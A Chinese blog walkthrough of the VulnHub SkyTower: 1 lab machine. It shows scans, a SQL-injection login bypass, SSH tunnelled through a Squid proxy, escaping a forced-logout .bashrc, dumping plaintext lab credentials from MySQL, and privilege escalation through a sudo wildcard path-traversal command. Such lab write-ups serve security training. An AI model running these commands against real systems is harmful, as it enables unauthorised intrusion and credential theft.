VulnHub靶机渗透:SKYTOWER: 1

最新推荐文章于 2024-04-08 14:45:00 发布
最新推荐文章于 2024-04-08 14:45:00 发布
阅读量655 收藏
点赞数
分类专栏: 渗透测试 打靶 vulnhub 文章标签: 网络 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mysmycbx/article/details/131365038
版权
渗透测试 同时被 3 个专栏收录
35 篇文章 0 订阅
订阅专栏
打靶
35 篇文章 0 订阅
订阅专栏
vulnhub
30 篇文章 1 订阅
订阅专栏

SKYTOWER: 1

靶机环境介绍

https://www.vulnhub.com/entry/skytower-1,96/
靶机IP:192.168.56.101
kali IP:192.168.56.102

nmap扫描

端口扫描

sudo nmap --min-rate=5000 -p- 192.168.56.101
[sudo] kali 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:36 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

服务扫描

sudo nmap -sVC -O -p22,80,3128 -oN nmap/details 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:37 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.59 seconds

漏洞扫描

sudo nmap --script=vuln -p22,80,3128 -oN nmap/vulns 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:39 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00049s latency).

PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
| http-enum:
|_  /login.php: Possible admin folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for forms:
|     Form at path: /, form's action: login.php. Fields that might be vulnerable:
|_      email
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.56.101:80/
|     Form id:
|_    Form action: login.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3128/tcp open     squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds

总结

发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。

80端口

日常,先目录爆破

目录爆破

$ sudo gobuster dir --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,rar,txt,html,jsp,zip -u http://192.168.56.101 | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.101
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,rar,html,jsp,zip
[+] Timeout:                 10s
===============================================================
2023/06/24 06:40:38 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 1136]
/.php                 (Status: 403) [Size: 286]
/index.html           (Status: 200) [Size: 1136]
/.html                (Status: 403) [Size: 287]
/login.php            (Status: 200) [Size: 21]
/background           (Status: 200) [Size: 2572609]
/.php                 (Status: 403) [Size: 286]
/.html                (Status: 403) [Size: 287]
/background2          (Status: 200) [Size: 2831446]
/server-status        (Status: 403) [Size: 295]

在目录爆破的过程中查看网页内容。
在这里插入图片描述
发现登录框,尝试万能密码。(这里用户和密码一样)
在这里插入图片描述
报错了,错误信息为
在这里插入图片描述
从这个信息可以看出,应该是过滤了=,or,这里修改一下。尝试绕过,先用 双写or绕过or。
在这里插入图片描述
登录成功了,
在这里插入图片描述
这里获取到一个凭据john:hereisjohn,提示去ssh登录,但是过滤了22端口呀,登录不上呀。没有思路了。下一个端口

3128端口

通过google搜索,发现该端口运行的是http-proxy Squid http proxy 3.1.20,是个代理服务,那有没有可能通过这个代理服务,访问到ssh的22端口呢。
通过搜索,发现可以使用proxytunnelproxychain,我这里使用的是proxytunnel

─$ proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666

这句话的意思是,使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为192.168.56.101:22端口,映射到本地kali的6666端口。
那我这里使用kali去连接。

$ ssh john@127.0.0.1 -p 6666
john@127.0.0.1's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 127.0.0.1 closed.

这里可以看到连接成功后,退出了。那可能是进行了关闭。但是ssh可以在连接的时候使用 -t 执行命令。
尝试一下。

获取立足点

$ ssh john@127.0.0.1 -p 6666 -t '/bin/bash'
john@127.0.0.1's password:

输入密码后,发现没有任何提示,也没有退出。这里尝试输入指令。

$ ssh john@127.0.0.1 -p 6666 -t '/bin/bash'
john@127.0.0.1's password:

whoami
john
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
id
uid=1000(john) gid=1000(john) groups=1000(john)

发现已经成功获取shell了。但是不太好用,也没有发现python程序。检查一下,为什么使用/bin//bash登录时,为什么会自动退出。

id
uid=1000(john) gid=1000(john) groups=1000(john)


ls -liah
total 24K
25132 drwx------ 2 john john 4.0K Jun 24 10:18 .
 7647 drwxr-xr-x 5 root root 4.0K Jun 20  2014 ..
   96 -rw------- 1 john john    7 Jun 20  2014 .bash_history
   79 -rw-r--r-- 1 john john  220 Jun 20  2014 .bash_logout
   80 -rw-r--r-- 1 john john 3.4K Jun 20  2014 .bashrc
   82 -rw-r--r-- 1 john john  675 Jun 20  2014 .profile



cat .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    #alias grep='grep --color=auto'
    #alias fgrep='fgrep --color=auto'
    #alias egrep='egrep --color=auto'
fi

# some more ls aliases
#alias ll='ls -l'
#alias la='ls -A'
#alias l='ls -CF'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

echo
echo  "Funds have been withdrawn"
exit
vim .bashrc
/bin/bash: line 20: vim: command not found

通过查看.bashrc发现,他输出一句话之后,退出了bash环境,那就先尝试使用sh环境,
ssh john@127.0.0.1 -p 6666 -t '/bin/sh'

这里使用vi(因为没有vim),删除最后一行的exit。然后保存。
在这里插入图片描述
然后输入/bin/bash,获得好用的bash环境。
在这里插入图片描述

john@SkyTower:~$ whoami
john
john@SkyTower:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
john@SkyTower:~$ uname -a
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
john@SkyTower:~$
john@SkyTower:~$

通过web页面知道,调用了sqll语句数据,那我们回到web目录查看有没有数据库信息。
在这里插入图片描述
发现了root:root信息,使用mysql登录一下。发现登录成功!

john@SkyTower:/var/www$ mysql -uroot -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)

mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show  tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

发现了三个用户信息。分别是sara:ihatethisjob william:senseable
通过尝试,发现,sara可以登录,而william无法登录显示密码错误。

(在这之前我尝试使用su sara登录发现,进入bash环境后,秒退,这里可以想到还是.bashrc的问题。那这里继续使用ssh登录。

获取立足点2

┌──(kali㉿kali)-[~/oscp/12.KsyTower1]
└─$ rlwrap ssh sara@127.0.0.1 -p 6666 -t '/bin/sh'
sara@127.0.0.1's password: ************
sara@127.0.0.1's password:
$ /bin/bash

           rlwrap: warning: rlwrap appears to do nothing for ssh, which asks for
                                                                                single keypresses all the time. Don't you need --always-readline
              and possibly --no-children? (cf. the rlwrap manpage)

                                                                  warnings can be silenced by the --no-warnings (-n) option

sara@SkyTower:~$ whoami
sara
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$

提权

这里发现可以root无密码执行/bin/cat /accounts/\*,一开始我以为只能访问/accounts/目录下的文件,但是通过思考,可以发现,这里的* 指的是通配符,也就是可以目录穿越访问。试一试。

sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root
/bin/cat: /accounts/../../../root: Is a directory
sara@SkyTower:~$ sudo /bin/ls /accounts/../../../root
flag.txt

这里发现了/root/flag.txt文件,查看一下。

sara@SkyTower:~$ sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:~$ su
Password:

sara@SkyTower:~$ su
Password:
root@SkyTower:/home/sara# whoami
root
root@SkyTower:/home/sara# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever
root@SkyTower:/home/sara# cd ~
root@SkyTower:~# ls
flag.txt
root@SkyTower:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 08:00:27:54:4a:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.101/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::a00:27ff:fe54:4a37/64 scope link
       valid_lft forever preferred_lft forever

总结

1、SQL注入时需要通过提示信息修改注入代码,完成绕过。
2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。
3、使用proxytunnel代理软件,完成代理服务。
proxytunnel -p 192.168.56.101:3128 -d 192.168.56.101:22 -a 6666
使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。
4、ssh john@127.0.0.1 -p 6666 -t '/bin/bash' ssh -t 可以使用-t 执行命令。
ssh username@remote_host -t command command_arguments
5、当发现/bash终端有问题时,可能是.bashrc文件出问题,可以尝试使用sh环境,查看.bashrc等其他文件。
6、当获取到反弹shell后,且web端存在sql数据操作,记得进入web目录查看配置文件,获取数据库信息。
7、获取到其他用户信息后可以尝试切换用户,使用sudo -l查看用户权限。
8、发现/bin/cat /accounts/* 这里可以使用目录穿越,这里的*表示通配符,可以使用/bin/cat /accounts/../../../path/to/file访问其他目录。

TryHardToKeep
关注
专栏目录
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 468
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1204
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
vulnhub SkyTower: 1
箭雨镜屋
12-21 3047
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
VulnHub靶机-SkyTower
Slow_的博客
02-26 776
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 580
vulnhub靶场--SkyTower靶场
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 271
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 928
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
No.11-VulnHub-SkyTower: 1-Walkthrough渗透学习
qq_34801745的博客
01-09 1742
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方...
11-VulnHub-SkyTower 1
尼德霍格007
07-31 482
vulnhub-SkyTower: 1 靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-31 一、信息收集 nmap扫描目标IP地址 nmap -sP 192.168.21.0/24 扫描到四个地址,分别是: 192.168.21.2——网关地址 192.168.21.147——靶机IP地址 192.168.21.254——DHCP服务器地址 192.16
Vulnhub:SkyTower:1靶机
qq_43884092的博客
03-19 155
修改/etc/proxychains4.conf,把代理指向目标的3128端口。使用弱口令:root|root,登录mysql,得到另外两个用户的密码。查看flag.txt,获得root的密码。靶机:192.168.111.236。使用ls查看root家目录下的文件。使用用户sara登录ssh。通过代理连接目标ssh。sara的sudo权限。
VulnHub-SkyTower: 1-靶机渗透学习
嗯嗯呐的博客
12-18 1333
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方面方法攻击系统并获得“标志”的能力。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap扫描靶机地址 nmap扫描端口 22 SSH 80 http
【甄选靶场】Vulnhub百个项目渗透——项目十一:skytower-1(代理登录ssh,绕过shell禁用)
人间体佐菲的博客
09-11 768
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.代理登录ssh2.绕过shell禁用。
22/tcp open|filtered ssh 80/tcp open|filtered http
weixin_30399871的博客
11-18 1244
22/tcp open|filtered ssh80/tcp open|filtered http nmap不能确定该端口是打开还是过滤,这可能是扫描一个打开的端口,但没有回应。 转载于:https://www.cnblogs.com/seasonsstory/p/3429805.html...
fwknop教程
会飞的码农
09-29 5413
fwknop教程 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 概述 fwknop实现了被称作为单包认证(SPA)的授权协议,目的是为了获得强大的服务隐藏功能。SPA只需要一个加密的单包、无需重发,而且可以通过HMAC实现认证,从而可以获取到权限访问隐藏在默认丢弃过滤规则的防火墙后面的服务。SPA的主应用就是利用防火墙拦截所有想访问服务的非法连接,目的是为了使得零日漏洞(刚刚发布且未打补丁的代码)被攻破变的更困难。所.
Nmap 端口扫描
热门推荐
看着博客敲代码
01-22 1万+
简介 端口扫描是Nmap的强项,大多数Nmap应用都是应用于对端口的扫描。 一、Nmap对端口的扫描有以下几种状态。 Open 端口开放状态 应用程序正在该端口接收TCP或UDP报文。这也是端口扫描的主要目标。它显示了网络上哪些服务可供使用。 Closed 端口关闭状态 关闭的端口对于Nmap也是可以访问的,但没有应用程序在其上监听。它可以显示该IP地址上的主机是否在运行,对操作系统探测有帮助。 Filtered 过滤的 由于包过滤阻止探测报文到达端口,Nmap无法确定该端口是否开放。过滤可能来自专业的防
一次应急响应记录
weixin_39445116的博客
12-18 79
经过这次事件,我学习到了:1. 在企业中防火墙非常重要,iptables一定要学会,新机器也可以用firewalld,但是经典就是经典,就像ak47,是战士亲密的战友。2.扫描器扫出来的漏洞的修补中,要尽量了解到主机的环境,了解其他相似主机的环境,找到其差异的地方,大部分情况下扫描器都是扫出了版本问题,如果类似openssh这种,我们有堡垒机就可以通过防火墙来过滤,如果是某些应用,可能只有升级。3.解决问题的过程中,需要灵活应变,多想几种方法,尽量了解事件的全貌,然后做出判断,着手解决。
端口敲击守护程序之DC-9
最新发布
zkaqlaoniao的博客
04-08 1074
发现SQL注入 → 登录系统 → 疑似文件包含→FUZZ参数 → 文件包含读取守护程序 → 敲击打开SSH端口 → 利用泄露账号密码登录提 权 思 路: 发现3个用户 → 登录获取密码字典 → 再次爆破获取第4个用户 →sudo文件发现 → 存在root权限写入功能 →passwd覆盖提权filtered过滤端口也是值得探索的内容可能存在端口敲击守护程序传参进行fuzz的时候还是要多试,顺便一提的是登录要记得带上cookie。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值